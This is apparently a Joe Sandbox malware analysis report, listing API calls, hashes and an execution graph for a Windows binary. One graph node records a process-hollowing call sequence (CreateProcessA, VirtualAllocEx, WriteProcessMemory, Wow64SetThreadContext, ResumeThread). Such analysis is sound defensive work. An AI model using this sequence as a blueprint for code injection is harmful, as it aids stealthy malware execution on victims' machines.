                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_
                                            • String ID: bad locale name
                                            • API String ID: 482894088-1405518554
                                            • Opcode ID: c59e7cefdbc4606d88ad96ad1e941a962ec3451a159a43885e1000177d6db04d
                                            • Instruction ID: c8b73a3f32a3425fff030222b4c85d498641f35f2647486ba0ad5e93b823c59c
                                            • Opcode Fuzzy Hash: c59e7cefdbc4606d88ad96ad1e941a962ec3451a159a43885e1000177d6db04d
                                            • Instruction Fuzzy Hash: DD01A1719017449FC7209FAA944014AFFE0BF19351B40896FE98DC7612D734DA48CB9D
                                            APIs
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00458A13,00000000,?,004AAA14,?,?,?,00458BB6,00000004,InitializeCriticalSectionEx,0046EB88,InitializeCriticalSectionEx), ref: 00458A6F
                                            • GetLastError.KERNEL32(?,00458A13,00000000,?,004AAA14,?,?,?,00458BB6,00000004,InitializeCriticalSectionEx,0046EB88,InitializeCriticalSectionEx,00000000,?,0045896D), ref: 00458A79
                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00458AA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LibraryLoad$ErrorLast
                                            • String ID: api-ms-
                                            • API String ID: 3177248105-2084034818
                                            • Opcode ID: dcee856ca35af1b7d27c4661515cebd36ea6bb81455881824c96c84151c1cc48
                                            • Instruction ID: f897ee7bf3d1deb7d04cadbf8927c650fdcc9ac2a96ab818c8c2b61f605ba9d2
                                            • Opcode Fuzzy Hash: dcee856ca35af1b7d27c4661515cebd36ea6bb81455881824c96c84151c1cc48
                                            • Instruction Fuzzy Hash: C2E01230B44208BBFF102B62DC06B593A95AB00B45F544036FD0DA85E3EFA5A915858D
                                            APIs
                                            • GetConsoleOutputCP.KERNEL32(FC3EAC19,00000000,00000000,00000000), ref: 0045FCA1
                                              • Part of subcall function 00463CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00462C36,?,00000000,-00000008), ref: 00463D50
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0045FEFC
                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0045FF44
                                            • GetLastError.KERNEL32 ref: 0045FFE7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                            • String ID:
                                            • API String ID: 2112829910-0
                                            • Opcode ID: a772aee2ff939b41ceacfe5d9c62a1c1649384db564b643223aab4dcc671577d
                                            • Instruction ID: b0da0c646494d065ff7e378305441b7dd3dc2c9910eec8cc6eb44b341c2662d4
                                            • Opcode Fuzzy Hash: a772aee2ff939b41ceacfe5d9c62a1c1649384db564b643223aab4dcc671577d
                                            • Instruction Fuzzy Hash: E3D17A76D00248AFCB11CFA8D8809AEBBB5FF09305F18412BE955E7352E734A94ACB55
                                            APIs
                                              • Part of subcall function 00463CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00462C36,?,00000000,-00000008), ref: 00463D50
                                            • GetLastError.KERNEL32 ref: 00464124
                                            • __dosmaperr.LIBCMT ref: 0046412B
                                            • GetLastError.KERNEL32(?,?,?,?), ref: 00464165
                                            • __dosmaperr.LIBCMT ref: 0046416C
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1913693674-0
                                            • Opcode ID: a31ab17ce530dd7109a8adec3e65158370b46e61d7cab84ede28d10ddcd09308
                                            • Instruction ID: f82c1261fc458f8c7373098b0792ebdcf48c0276872e8635986a425d170fc911
                                            • Opcode Fuzzy Hash: a31ab17ce530dd7109a8adec3e65158370b46e61d7cab84ede28d10ddcd09308
                                            • Instruction Fuzzy Hash: 7521F831600615BFCF20AF62CC559ABB7ADFF92368710851EF95597201FB38EC418B9A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be49f80d482dc167accdbb5ac515b9026d1dace0591460f3eadbb4ef178a49ef
                                            • Instruction ID: 6b85ae093f021ed72ea2294eccd63d84d8c7873224d449c59348b3256c604115
                                            • Opcode Fuzzy Hash: be49f80d482dc167accdbb5ac515b9026d1dace0591460f3eadbb4ef178a49ef
                                            • Instruction Fuzzy Hash: F621B331600605BFCB30AF628C8093B7769EF0136AB10851AFD1497243E738DC0987D8
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32 ref: 0046505E
                                              • Part of subcall function 00463CA4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00462C36,?,00000000,-00000008), ref: 00463D50
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00465096
                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004650B6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                            • String ID:
                                            • API String ID: 158306478-0
                                            • Opcode ID: 51ce92426123f40590c88cf86d2228f1cea69b6e0d202cc35a24e167a722fdb6
                                            • Instruction ID: 2557d115c5af9378b345cf070c8adc42221ff2442f45d8e04d35a70da85e9604
                                            • Opcode Fuzzy Hash: 51ce92426123f40590c88cf86d2228f1cea69b6e0d202cc35a24e167a722fdb6
                                            • Instruction Fuzzy Hash: F111DBF2901A157FB7212B739C8ADBF699CDD99399B14012AF901D1201FE6CCE4145BF
                                            APIs
                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00468281,00000000,00000001,00000000,00000000,?,0046003B,00000000,00000000,00000000), ref: 0046949C
                                            • GetLastError.KERNEL32(?,00468281,00000000,00000001,00000000,00000000,?,0046003B,00000000,00000000,00000000,00000000,00000000,?,004605C2,00000000), ref: 004694A8
                                              • Part of subcall function 0046946E: CloseHandle.KERNEL32(FFFFFFFE,004694B8,?,00468281,00000000,00000001,00000000,00000000,?,0046003B,00000000,00000000,00000000,00000000,00000000), ref: 0046947E
                                            • ___initconout.LIBCMT ref: 004694B8
                                              • Part of subcall function 00469430: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0046945F,0046826E,00000000,?,0046003B,00000000,00000000,00000000,00000000), ref: 00469443
                                            • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00468281,00000000,00000001,00000000,00000000,?,0046003B,00000000,00000000,00000000,00000000), ref: 004694CD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                            • String ID:
                                            • API String ID: 2744216297-0
                                            • Opcode ID: 85cf840b79399ef3509f0402c54d26a4153afc6378edb7591b24619cf7b00649
                                            • Instruction ID: 5874fae92c2bc14467ef7cbd3d2cafd547fe3d3fccdd653ad5a0f312176f040e
                                            • Opcode Fuzzy Hash: 85cf840b79399ef3509f0402c54d26a4153afc6378edb7591b24619cf7b00649
                                            • Instruction Fuzzy Hash: 35F01C36905154BBCF221F92DC04A9E3F2AFB093B5F054025FA19D5130EEB28D61DB9A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: H_prolog3_catch_strlen
                                            • String ID: Madino Mino
                                            • API String ID: 3133806014-1963490786
                                            • Opcode ID: e3cff5fd24a43ac2364fd8613c222eb0766162901eac8535a501925826aeb722
                                            • Instruction ID: c27ebd37403b3307f1e9c938c0dc014d5c61f4f7063943af2d36b945a5312412
                                            • Opcode Fuzzy Hash: e3cff5fd24a43ac2364fd8613c222eb0766162901eac8535a501925826aeb722
                                            • Instruction Fuzzy Hash: 1441B535A002048FCB21EF6DC880A6D7BE1BB49725B24425BEC249B3E3C7759C99CB5D
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?), ref: 00458052
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: aecd3939091fd49f3a0954516e4328cbd9ff1a36a2de4007621dc1e916531b03
                                            • Instruction ID: 5cc42b448d8634a5232e56b8b5308d0dd3e8b91ea2e316b791bb15c44fc38993
                                            • Opcode Fuzzy Hash: aecd3939091fd49f3a0954516e4328cbd9ff1a36a2de4007621dc1e916531b03
                                            • Instruction Fuzzy Hash: 8F418772900209AFCF16CF94CC81AEEBBB5BF48305F15805AFE0477262DB399A55CB54
                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00453D24
                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00453D80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                            • String ID: |,E
                                            • API String ID: 593203224-2637010583
                                            • Opcode ID: e199847d904f1ce2ff329929aa58ad48e79915490984d055920808c70cc25ae0
                                            • Instruction ID: 856fd6b21c3e2c16263a0fc03655f6ad4be394696f6c00fefb75a29b293fba50
                                            • Opcode Fuzzy Hash: e199847d904f1ce2ff329929aa58ad48e79915490984d055920808c70cc25ae0
                                            • Instruction Fuzzy Hash: 5101B535A00614EFCB01DF15C855E9E7BB9EF85392F14009AE8019B3A2EF70EE08CB95
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 0045F470
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpin
                                            • String ID: InitializeCriticalSectionEx$|,E
                                            • API String ID: 2593887523-3198871065
                                            • Opcode ID: 51ede29d76b5098c71da10cbfddee4b21f1170a9b790408fe5953c1520c7f026
                                            • Instruction ID: 733863ffa9cbb80f2bb8343e554abe99f5a8a234d732c668c1091b83a3c366d7
                                            • Opcode Fuzzy Hash: 51ede29d76b5098c71da10cbfddee4b21f1170a9b790408fe5953c1520c7f026
                                            • Instruction Fuzzy Hash: CFE06D32A81218B7CF111F92DC09ECE3E11EB51BA2F108422FD1D5516296B698259A8A
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2293409621.0000000000451000.00000020.00000001.01000000.00000009.sdmp, Offset: 00450000, based on PE: true
                                            • Associated: 00000009.00000002.2293385143.0000000000450000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293434354.000000000046D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.0000000000477000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293452659.00000000004A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000009.00000002.2293613495.00000000004AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_450000_ogoGQsWFwF_EcodN5qF7hiVC.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Alloc
                                            • String ID: FlsAlloc$|,E
                                            • API String ID: 2773662609-2341252548
                                            • Opcode ID: bdcdeba31fcce7e898e225256518e8e2c6eaf2438bba9786d58c000da5d88b5e
                                            • Instruction ID: 41178a9d0abed9b306a7f51983f5ae4fe9c66fde30c1fe34f6fa1be2e5552124
                                            • Opcode Fuzzy Hash: bdcdeba31fcce7e898e225256518e8e2c6eaf2438bba9786d58c000da5d88b5e
                                            • Instruction Fuzzy Hash: 0CE0C236E81324F38A2126929C0AEEEBA149B50B62F244073FE0952242A9E90C1586DF

                                            Execution Graph

                                            Execution Coverage:4.4%
                                            Dynamic/Decrypted Code Coverage:0.4%
                                            Signature Coverage:0%
                                            Total number of Nodes:1440
                                            Total number of Limit Nodes:20
                                            execution_graph 15128 aa10ac 15133 aa3a7b 15128->15133 15134 aa3a8b 15133->15134 15135 aa10b1 15133->15135 15134->15135 15140 aa4306 InitializeCriticalSectionEx 15134->15140 15137 aa4a41 15135->15137 15141 aa4a14 15137->15141 15140->15134 15142 aa4a2a 15141->15142 15143 aa4a23 15141->15143 15150 aade5b 15142->15150 15147 aaddde 15143->15147 15146 aa10bb 15148 aade5b 44 API calls 15147->15148 15149 aaddf0 15148->15149 15149->15146 15153 aadba7 15150->15153 15154 aadbb3 __FrameHandler3::FrameUnwindToState 15153->15154 15161 aaa722 EnterCriticalSection 15154->15161 15156 aadbc1 15162 aadc02 15156->15162 15158 aadbce 15172 aadbf6 15158->15172 15161->15156 15164 aadc1d 15162->15164 15165 aadc90 std::_Lockit::_Lockit 15162->15165 15163 aadc70 15163->15165 15167 ab7a10 44 API calls 15163->15167 15164->15163 15164->15165 15175 ab7a10 15164->15175 15165->15158 15169 aadc86 15167->15169 15168 aadc66 15170 aaee48 ___free_lconv_mon 14 API calls 15168->15170 15171 aaee48 ___free_lconv_mon 14 API calls 15169->15171 15170->15163 15171->15165 15203 aaa76a LeaveCriticalSection 15172->15203 15174 aadbdf 15174->15146 15176 ab7a38 15175->15176 15177 ab7a1d 15175->15177 15181 ab7a47 15176->15181 15184 ab923f 15176->15184 15177->15176 15178 ab7a29 15177->15178 15180 aab188 __dosmaperr 14 API calls 15178->15180 15183 ab7a2e __fread_nolock 15180->15183 15191 ab3a16 15181->15191 15183->15168 15185 ab924a 15184->15185 15186 ab925f HeapSize 15184->15186 15187 aab188 __dosmaperr 14 API calls 15185->15187 15186->15181 15188 ab924f 15187->15188 15189 aa9007 __strnicoll 41 API calls 15188->15189 15190 ab925a 15189->15190 15190->15181 15192 ab3a2e 15191->15192 15193 ab3a23 15191->15193 15195 ab3a3f __Getctype 15192->15195 15196 ab3a36 15192->15196 15194 ab1e71 __strnicoll 15 API calls 15193->15194 15200 ab3a2b 15194->15200 15198 ab3a69 HeapReAlloc 15195->15198 15199 ab3a44 15195->15199 15202 aadac3 codecvt 2 API calls 15195->15202 15197 aaee48 ___free_lconv_mon 14 API calls 15196->15197 15197->15200 15198->15195 15198->15200 15201 aab188 __dosmaperr 14 API calls 15199->15201 15200->15183 15201->15200 15202->15195 15203->15174 17529 aae9c7 17530 aae9d2 17529->17530 17531 aae9e2 17529->17531 17535 aae9e8 17530->17535 17534 aaee48 ___free_lconv_mon 14 API calls 17534->17531 17536 aae9fd 17535->17536 17537 aaea03 17535->17537 17538 aaee48 ___free_lconv_mon 14 API calls 17536->17538 17539 aaee48 ___free_lconv_mon 14 API calls 17537->17539 17538->17537 17540 aaea0f 17539->17540 17541 aaee48 ___free_lconv_mon 14 API calls 17540->17541 17542 aaea1a 17541->17542 17543 aaee48 ___free_lconv_mon 14 API calls 17542->17543 17544 aaea25 17543->17544 17545 aaee48 ___free_lconv_mon 14 API calls 17544->17545 17546 aaea30 17545->17546 17547 aaee48 ___free_lconv_mon 14 API calls 17546->17547 17548 aaea3b 17547->17548 17549 aaee48 ___free_lconv_mon 14 API calls 17548->17549 17550 aaea46 17549->17550 17551 aaee48 ___free_lconv_mon 14 API calls 17550->17551 17552 aaea51 17551->17552 17553 aaee48 ___free_lconv_mon 14 API calls 17552->17553 17554 aaea5c 17553->17554 17555 aaee48 ___free_lconv_mon 14 API calls 17554->17555 17556 aaea6a 17555->17556 17561 aae814 17556->17561 17562 aae820 __FrameHandler3::FrameUnwindToState 17561->17562 17577 aaa722 EnterCriticalSection 17562->17577 17564 aae854 17578 aae873 17564->17578 17566 aae82a 17566->17564 17568 aaee48 ___free_lconv_mon 14 API calls 17566->17568 17568->17564 17569 aae87f 17570 aae88b __FrameHandler3::FrameUnwindToState 17569->17570 17582 aaa722 EnterCriticalSection 17570->17582 17572 aae895 17573 aaeab5 __Getctype 14 API calls 17572->17573 17574 aae8a8 17573->17574 17583 aae8c8 17574->17583 17577->17566 17581 aaa76a LeaveCriticalSection 17578->17581 17580 aae861 17580->17569 17581->17580 17582->17572 17586 aaa76a LeaveCriticalSection 17583->17586 17585 aae8b6 17585->17534 17586->17585 13653 117018d 13656 11701c5 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 13653->13656 13655 11703a2 WriteProcessMemory 13657 11703e7 13655->13657 13656->13655 13658 11703ec WriteProcessMemory 13657->13658 13659 1170429 WriteProcessMemory Wow64SetThreadContext ResumeThread 13657->13659 13658->13657 16123 aa3c37 16126 aa3bb8 16123->16126 16125 aa3c42 _Deallocate 16131 aa3d18 16126->16131 16129 aa3bd6 16129->16125 16130 aaa6c6 ___std_exception_destroy 14 API calls 16130->16129 16138 aa3aa8 16131->16138 16134 aaa6c6 ___std_exception_destroy 14 API calls 16135 aa3d7c 16134->16135 16144 aa3b00 16135->16144 16137 aa3bc7 16137->16129 16137->16130 16139 aa3abe 16138->16139 16140 aa3ab7 16138->16140 16142 aa3abc 16139->16142 16156 aa431b EnterCriticalSection 16139->16156 16151 aaa781 16140->16151 16142->16134 16145 aa3b0a 16144->16145 16146 aaa78f 16144->16146 16148 aa3b1d 16145->16148 16202 aa4329 LeaveCriticalSection 16145->16202 16203 aaa76a LeaveCriticalSection 16146->16203 16148->16137 16149 aaa796 16149->16137 16157 aaf58b 16151->16157 16156->16142 16158 aaef3a std::_Lockit::_Lockit 5 API calls 16157->16158 16159 aaf590 16158->16159 16160 aaef54 std::_Lockit::_Lockit 5 API calls 16159->16160 16161 aaf595 16160->16161 16178 aaef6e 16161->16178 16177 aaf5bd 16177->16177 16179 aaf123 std::_Lockit::_Lockit 5 API calls 16178->16179 16180 aaef84 16179->16180 16181 aaef88 16180->16181 16182 aaf123 std::_Lockit::_Lockit 5 API calls 16181->16182 16183 aaef9e 16182->16183 16184 aaefa2 16183->16184 16185 aaf123 std::_Lockit::_Lockit 5 API calls 16184->16185 16186 aaefb8 16185->16186 16187 aaefbc 16186->16187 16188 aaf123 std::_Lockit::_Lockit 5 API calls 16187->16188 16189 aaefd2 16188->16189 16190 aaefd6 16189->16190 16191 aaf123 std::_Lockit::_Lockit 5 API calls 16190->16191 16192 aaefec 16191->16192 16193 aaeff0 16192->16193 16194 aaf123 std::_Lockit::_Lockit 5 API calls 16193->16194 16195 aaf006 16194->16195 16196 aaf024 16195->16196 16197 aaf123 std::_Lockit::_Lockit 5 API calls 16196->16197 16198 aaf03a 16197->16198 16199 aaf00a 16198->16199 16200 aaf123 std::_Lockit::_Lockit 5 API calls 16199->16200 16201 aaf020 16200->16201 16201->16177 16202->16148 16203->16149 16286 aa1000 16291 aa21db 16286->16291 16288 aa1013 16289 aa4a41 44 API calls 16288->16289 16290 aa101d 16289->16290 16292 aa21e7 __EH_prolog3 16291->16292 16295 aa2f32 16292->16295 16294 aa2239 codecvt 16294->16288 16304 aa2bd6 16295->16304 16297 aa2f3d 16312 aa358f 16297->16312 16299 aa2f50 16300 aa2f69 16299->16300 16301 aa14f1 std::ios_base::_Init 43 API calls 16299->16301 16302 aa2f75 16300->16302 16316 aa4121 16300->16316 16301->16300 16302->16294 16305 aa2be2 __EH_prolog3 16304->16305 16306 aa14f1 std::ios_base::_Init 43 API calls 16305->16306 16307 aa2c13 16306->16307 16308 aa479f codecvt 43 API calls 16307->16308 16309 aa2c1a 16308->16309 16311 aa2c2b codecvt 16309->16311 16321 aa3c8b 16309->16321 16311->16297 16313 aa359b __EH_prolog3 16312->16313 16365 aa2121 16313->16365 16315 aa35b3 std::ios_base::_Ios_base_dtor codecvt 16315->16299 16317 aa3aa8 std::_Lockit::_Lockit 7 API calls 16316->16317 16318 aa4131 16317->16318 16319 aa3b00 std::_Lockit::~_Lockit 2 API calls 16318->16319 16320 aa416f 16319->16320 16320->16302 16322 aa3c97 __EH_prolog3 16321->16322 16323 aa3aa8 std::_Lockit::_Lockit 7 API calls 16322->16323 16324 aa3ca2 16323->16324 16332 aa3cd3 16324->16332 16333 aa3dee 16324->16333 16326 aa3b00 std::_Lockit::~_Lockit 2 API calls 16328 aa3d10 codecvt 16326->16328 16327 aa3cb5 16339 aa3e11 16327->16339 16328->16311 16332->16326 16334 aa479f codecvt 43 API calls 16333->16334 16335 aa3df9 16334->16335 16336 aa3e0d 16335->16336 16349 aa3b1f 16335->16349 16336->16327 16340 aa3e1d 16339->16340 16342 aa3cbd 16339->16342 16352 aa42c9 16340->16352 16343 aa3be3 16342->16343 16344 aa3bf1 16343->16344 16348 aa3c1c ctype 16343->16348 16345 aa3bfd 16344->16345 16346 aaa6c6 ___std_exception_destroy 14 API calls 16344->16346 16347 aaa798 _Yarn 15 API calls 16345->16347 16345->16348 16346->16345 16347->16348 16348->16332 16350 aa3be3 _Yarn 15 API calls 16349->16350 16351 aa3b59 16350->16351 16351->16327 16353 aa42d9 EncodePointer 16352->16353 16354 aab0a7 16352->16354 16353->16342 16353->16354 16355 ab2dfa std::locale::_Setgloballocale 2 API calls 16354->16355 16356 aab0ac 16355->16356 16357 aab0b7 16356->16357 